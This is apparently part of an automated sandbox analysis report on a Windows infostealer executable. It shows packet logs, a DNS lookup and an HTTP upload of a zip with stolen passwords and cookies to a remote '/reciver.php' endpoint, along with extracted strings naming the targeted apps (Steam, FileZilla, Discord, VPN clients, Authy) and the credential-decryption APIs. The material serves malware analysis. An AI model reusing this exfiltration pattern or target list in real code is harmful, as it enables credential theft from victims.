Mar 27, 2021 08:15:23.079216957 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.079350948 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079382896 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.079444885 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079454899 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.079541922 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.079608917 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079706907 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.079854965 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079864979 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079879999 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.079972029 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.080001116 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.080131054 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.082093954 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.173167944 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.173186064 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.173204899 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.173329115 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.173413992 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.173532963 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.173548937 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.173568010 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.173640013 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.173687935 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177222013 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177237034 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177257061 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177268982 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177301884 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177320957 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177345991 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177361965 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177376032 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177397013 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177431107 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177447081 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177464008 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177478075 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177480936 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177504063 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177519083 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177551985 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177572012 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177587032 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177602053 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177625895 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177640915 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177642107 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177680969 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177694082 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177711010 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177727938 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177750111 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177767992 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177777052 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177792072 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177809000 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177825928 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177834034 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.177855015 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177880049 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177921057 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177963972 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.177982092 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.178004026 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.178071022 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.178112984 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.178205013 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.178378105 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.178395033 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.178793907 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.178921938 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.178945065 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.178961039 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267328024 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267338037 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267348051 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267354965 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267456055 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267466068 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267493010 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267623901 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.267740011 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.271668911 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.271748066 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.271822929 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.271989107 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.272066116 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.272185087 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.272367954 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.272469997 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.272480011 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.272598028 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.272826910 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.273185015 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.273195982 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.273406982 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.273531914 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.273668051 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.273787022 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.273900986 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274024010 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274187088 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274198055 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274264097 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274461985 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274539948 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274621964 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.274909973 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275116920 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275130033 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275227070 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275237083 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275301933 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275429010 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275546074 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.275669098 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.467627048 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.561355114 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.780422926 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.874279976 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.874540091 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.875426054 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.969070911 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.969301939 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.969357967 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:23.969393015 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:23.969520092 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.063266039 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.063287973 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.063294888 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.063569069 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.063636065 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.157279015 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.157363892 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.157432079 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.157533884 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.157547951 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.157558918 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.157629967 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.157680035 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.157711029 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.157740116 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251144886 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.251266956 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.251279116 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251281023 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.251297951 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.251312017 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.251319885 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251333952 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251368046 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251391888 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251408100 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.251441002 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251467943 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251545906 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.251585007 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251617908 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:24.251696110 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.345716953 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.345735073 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.345746040 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.345762968 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.345774889 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.345844984 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.345935106 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.767219067 CET	80	49704	5.23.51.54	192.168.2.6
Mar 27, 2021 08:15:24.767354012 CET	49704	80	192.168.2.6	5.23.51.54
Mar 27, 2021 08:15:26.876053095 CET	49704	80	192.168.2.6	5.23.51.54

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2021 08:15:05.869012117 CET	49283	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:05.914899111 CET	53	49283	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:07.830590010 CET	58377	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:07.876503944 CET	53	58377	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:09.449173927 CET	55074	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:09.498069048 CET	53	55074	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:10.530627012 CET	54513	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:10.578025103 CET	53	54513	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:11.280558109 CET	62044	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:11.330178976 CET	53	62044	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:14.282344103 CET	63791	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:14.351161003 CET	53	63791	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:19.905613899 CET	64267	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:19.954433918 CET	53	64267	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:20.813286066 CET	49448	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:20.859411955 CET	53	49448	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:21.630893946 CET	60342	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:21.680279970 CET	53	60342	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:22.484585047 CET	61346	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:22.498648882 CET	51774	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:22.536140919 CET	53	61346	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:22.589356899 CET	53	51774	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:23.262778997 CET	56023	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:23.308779001 CET	53	56023	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:24.138442993 CET	58384	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:24.184369087 CET	53	58384	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:25.057255030 CET	60261	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:25.103001118 CET	53	60261	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:26.331418037 CET	56061	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:26.381531954 CET	53	56061	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:27.825177908 CET	58336	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:27.872855902 CET	53	58336	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:28.755374908 CET	53781	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:28.804284096 CET	53	53781	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:31.507539988 CET	54064	53	192.168.2.6	8.8.8.8
Mar 27, 2021 08:15:31.553369045 CET	53	54064	8.8.8.8	192.168.2.6
Mar 27, 2021 08:15:33.238620996 CET	52811	53	192.168.2.6	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 27, 2021 08:15:22.498648882 CET	192.168.2.6	8.8.8.8	0xea19	Standard query (0)	ck12339.tmweb.ru	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 27, 2021 08:15:22.589356899 CET	8.8.8.8	192.168.2.6	0xea19	No error (0)	ck12339.tmweb.ru		5.23.51.54	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ck12339.tmweb.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49704	5.23.51.54	80	C:\Users\user\Desktop\SpiMLVsYmg.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2021 08:15:22.700305939 CET	268	OUT	GET /reciver.php HTTP/1.1 Accept: / Content-Type: application/octet-stream; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Host: ck12339.tmweb.ru Content-Length: 552234
Mar 27, 2021 08:15:22.700326920 CET	280	OUT	Data Raw: 26 6d 08 00 04 00 00 00 04 93 f7 ff 0b 00 00 00 94 6c 08 00 04 00 00 00 88 6c 08 00 50 4b 03 04 14 00 00 00 08 00 27 a5 9f eb 00 00 00 00 02 00 00 00 00 00 00 00 11 00 00 00 70 61 73 73 77 6f 72 64 73 5f 61 6c 6c 2e 74 78 74 03 00 50 4b 03 04 14 Data Ascii: &mllPK'passwords_all.txtPK',Application Data_cookie0.txtUOO@U?JFR[]4v7PN_w=kT,hs!/'9CM;`ct53^*"r
Mar 27, 2021 08:15:22.794327021 CET	286	OUT	Data Raw: 74 b9 a1 4b 63 27 e2 ce 01 65 b6 34 1d 01 a4 16 81 ef ea 7c 14 b0 a1 dc 07 ff cb 9e 6c 74 24 b8 d2 18 a4 4d 1c ab b4 21 23 5b 1d 1f b6 60 e8 a7 36 9c 06 14 9c 1b 38 bb 2a a8 b3 3c 1b 82 ac ea a2 25 8d 0d 84 9a a9 2c ce 91 34 b7 13 26 f3 7a 07 65 Data Ascii: tKc'e4\|lt$M!#[`68<%,4&ze G[%JGr&G)Lz,=&_3}g/z}3.uG5DA6"8~J@^aGyF:~.RNk]/A
Mar 27, 2021 08:15:22.794531107 CET	288	OUT	Data Raw: 33 e0 b0 bf 9d 63 6c f0 7b c4 eb 16 e0 27 31 09 f2 8f df 03 96 45 48 0e e0 ed 2b 4e 1a 2a 9b f7 ee 1a a1 e3 99 81 ca ed 2b 4e be 6c 41 a7 52 bd c7 f6 97 6f fe f9 d1 dd 03 15 3a ff 6f 17 f5 de b6 e2 24 bf 7c 6c 18 51 3a b7 37 3a ba 70 eb e5 e0 c0 Data Ascii: 3cl{'1EH+N+NlARo:o$\|lQ:7:pLG_WEAeg<yBx:cTs-i.zw#s]DW7PF5Jaynic#w*p.['&bihsGXgpt9SwEg{
Mar 27, 2021 08:15:22.794644117 CET	291	OUT	Data Raw: 02 88 c9 47 4f 01 89 dd 3a 48 aa a4 11 85 39 31 c8 7c 52 88 a1 15 bd 18 59 2f f1 88 75 dc e0 15 e4 7c 9d 0d ff 97 d0 7b 06 b0 b9 f5 25 d6 dc bb ae fb 72 1f e8 76 5b 02 8d cb c0 04 0f 85 92 6a 44 99 54 4e 3b 14 5a 0e 5a 72 fc 6b 34 fa d9 28 ed bb Data Ascii: GO:H91\|RY/u\|{%rv[jDTN;ZZrk4(c?V_5HZcBoOu=}>3{?8sI^\|%1wk3f.JCOTC_9sG>:TY,Jv/ bZl+-1wOo
Mar 27, 2021 08:15:22.794951916 CET	294	OUT	Data Raw: 03 a9 82 b9 62 eb 5b bf 81 81 5d 62 6c fd d4 08 aa 94 50 75 9c 6e d5 fb 20 95 50 a5 c2 ff b5 ef 5d 23 5a 81 d6 19 4b 01 72 70 d7 96 4f 95 a8 02 f0 ae 1b f7 bd f5 93 be 8b 52 32 9d be 62 2e df 7a f0 b7 70 cf c7 50 65 04 99 5c 19 b6 38 be f4 96 ff Data Ascii: b[]blPun P]#ZKrpOR2b.zpPe\8N~;PY'}tTb5g_Zc-g>oi)gS@j;~CV60eOd7wKv-\|G
Mar 27, 2021 08:15:22.795223951 CET	297	OUT	Data Raw: 69 24 dc a8 06 22 96 69 01 87 b3 71 11 e1 23 60 d7 f9 82 dd 52 6b 9a a4 a3 92 c3 7e b1 d3 99 f3 4f 2a a3 e1 08 21 db 14 1d db 76 d0 31 8c bf fb e4 c8 91 26 48 bb 27 55 80 f6 fd 1b 97 61 bc 6c 63 ff ca ab d7 19 d3 d8 c2 7b cf 5d 84 ce 59 ff c8 00 Data Ascii: i$"iq#`Rk~O!v1&H'Ualc{]Y?,_xyV/\|eD=[-_?~pJO3_gz.V(@l-EjbrQem:%#ln}o?XY7}v{]tu?m}K)EdP-\8e
Mar 27, 2021 08:15:22.795471907 CET	299	OUT	Data Raw: 48 fc c4 97 e0 ef 18 46 56 89 35 89 05 94 c5 e7 90 64 67 27 15 8a ec 2b 3b d9 48 6a 7a 82 d3 cf 06 39 1a 0b 9e c2 7e 71 35 11 be b0 8c 1c 0a ec 84 19 8f 74 03 5d a4 33 cc 4d f4 47 d8 32 18 19 0f 45 91 fb cb 3e 62 bc 31 d8 ab 0b 82 08 26 fb 14 fb Data Ascii: HFV5dg'+;Hjz9~q5t]3MG2E>b1&O()k,6q:lqf%Ovp/ewdAJF6@lFv5r8[!wvWUX]#jGh_2eNlo~%lpVY\|)GUAib+3U6
Mar 27, 2021 08:15:22.795994043 CET	302	OUT	Data Raw: 19 f6 d9 b4 14 36 d3 96 f0 22 f7 43 1a 86 62 30 77 a1 d7 38 0c 0a 14 d7 9a eb f4 fe a6 94 41 84 54 c6 15 9d 38 18 39 22 9e d7 6d db 86 46 11 6b 59 38 68 ec 62 56 60 3a 26 94 b5 b5 3e aa 94 8f 2d a1 4a 25 76 d9 f6 08 0f 4b af 8d 53 68 9b f6 8a be Data Ascii: 6"Cb0w8AT89"mFkY8hbV`:&>-J%vKShQY,CXei z{@\|\|_8vm27+AVEb\w*!j.\|"@~J4)]3@=)0hhf,G)q(7>AZ
Mar 27, 2021 08:15:22.796089888 CET	305	OUT	Data Raw: c5 a5 6a 5e 7c 35 6d ee a1 26 4b d7 73 03 8d a0 8d 6d 1c de b9 dc 89 68 45 5a a4 6d 33 2b 40 a7 f7 23 a0 66 39 a9 18 83 65 6d bb 18 c6 aa 6f 60 d9 65 31 6b cb cb d9 a4 cd 76 79 59 a0 0d 90 77 6f 70 51 fa 0e fe ea 7b c1 fd b4 42 7f 2d 75 48 18 1f Data Ascii: j^\|5m&KsmhEZm3+@#f9emo`e1kvyYwopQ{B-uH/^!mQXM\-PwGa@+hlPosZeZiu85*(WoSt;{:mY=f.@pV#ySR]~ e>;TS0$R"I
Mar 27, 2021 08:15:22.796283960 CET	307	OUT	Data Raw: bc c5 63 f3 27 d8 d3 f7 b9 a4 8a 92 15 75 db 64 ff d6 86 42 95 4f f7 69 bf 00 72 19 ac af cc 8d 4c 45 1b cb 15 17 04 c9 c9 cf 18 a4 83 a3 93 de c8 04 8e 4e d0 e0 b7 c8 23 23 8c 79 a3 5c 85 25 da 74 e4 7b 01 63 77 c6 fb 01 e3 4b 63 ed b3 17 e3 e5 Data Ascii: c'udBOirLEN##y\%t{cwKcb/@^Pusxup.1ar6:tDJ,Al>D'K~#e?*hP0=fkEyScUx)^snZ.#jo-f[~'yn{,
Mar 27, 2021 08:15:24.767219067 CET	917	IN	HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Sat, 27 Mar 2021 07:15:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: SpiMLVsYmg.exe PID: 6504 Parent PID: 6100

General

Start time:	08:15:13
Start date:	27/03/2021
Path:	C:\Users\user\Desktop\SpiMLVsYmg.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SpiMLVsYmg.exe'
Imagebase:	0xd20000
File size:	771072 bytes
MD5 hash:	F56A39A0417C779C0B48FA7B2638CC58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SpiMLVsYmg.exe PID: 6504 Parent PID: 6100 SpiMLVsYmg.exeCOMMON

Executed Functions

Function 00D2FE64, Relevance: 249.3, APIs: 49, Strings: 91, Instructions: 4315stringCOMMON

Download Yara Rule

APIs

GetSystemWow64DirectoryW.KERNEL32(00000000,00000000), ref: 00D305FC
lstrcpyW.KERNEL32 ref: 00D3062E

Strings

InternetReadFile, xrefs: 00D31B2D
fi, xrefs: 00D33DDE
wininet.dll, xrefs: 00D314D5, 00D31A91
IsTextUnicode, xrefs: 00D31A19
LoadLibraryW, xrefs: 00D306D8, 00D3181A
discord, xrefs: 00D34568
PathFileExistsW, xrefs: 00D31C05
AppData, xrefs: 00D31C80
foo1.zip, xrefs: 00D34882
SourceModInstallPath, xrefs: 00D3465D
RegOpenKeyExW, xrefs: 00D31995
d, xrefs: 00D33E44
passwords_all.txt, xrefs: 00D2FF8A
x, xrefs: 00D33E16
f, xrefs: 00D33E0E
om, xrefs: 00D33E3A
%s%s%s%S, xrefs: 00D3449B
StrChrA, xrefs: 00D31B9C
CRYPT32.dll, xrefs: 00D31370, 00D318D5
CryptStringToBinaryA, xrefs: 00D316B5, 00D3193B
CreateFileW, xrefs: 00D31883
FindNextFileW, xrefs: 00D31859
filezilla.log, xrefs: 00D3442F
CryptStringToBinaryW, xrefs: 00D31920
Software\Valve\Steam, xrefs: 00D34657
auth-data, xrefs: 00D34255
%S.txt, xrefs: 00D3429F
entropy, xrefs: 00D34236
ProtonVPN, xrefs: 00D3438D
Local AppData, xrefs: 00D31CA5
FindClose, xrefs: 00D3186D
InternetCloseHandle, xrefs: 00D31B48
InstallLocation, xrefs: 00D34555
NordVPN, xrefs: 00D34397
RegQueryInfoKeyW, xrefs: 00D319C8
x, xrefs: 00D33E56
CredEnumerateW, xrefs: 00D31A4F
FileZilla\sitemanager.xml, xrefs: 00D343EF
FreeLibrary, xrefs: 00D3182F
StrStrA, xrefs: 00D31C18
StrStrW, xrefs: 00D31BCF
x, xrefs: 00D33E06
cm, xrefs: 00D33E28
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00D31C76
C:\\Windows\\System32\\kernel32.dll, xrefs: 00D30617
ssfn, xrefs: 00D34752
GetProcAddress, xrefs: 00D306E8, 00D3180A
Steam\config\SteamAppData.vdf, xrefs: 00D346EC
CredFree, xrefs: 00D31A6A
StrRChrW, xrefs: 00D31C3B
GetCurrentHwProfileA, xrefs: 00D31A34
bi, xrefs: 00D33E66
ad, xrefs: 00D33D13
PathFindNextComponentW, xrefs: 00D31C56
StrChrW, xrefs: 00D31BB4
Psi\profiles\default\accounts.xml, xrefs: 00D345D0
Authy Desktop, xrefs: 00D34599
pu, xrefs: 00D33D1D
RegQueryValueExW, xrefs: 00D319E3
HttpSendRequestW, xrefs: 00D31B12
CryptUnprotectData, xrefs: 00D31908
C:\\Windows\\System32\\, xrefs: 00D3027E, 00D30621
fo, xrefs: 00D33DE8
config\config.vdf, xrefs: 00D34690
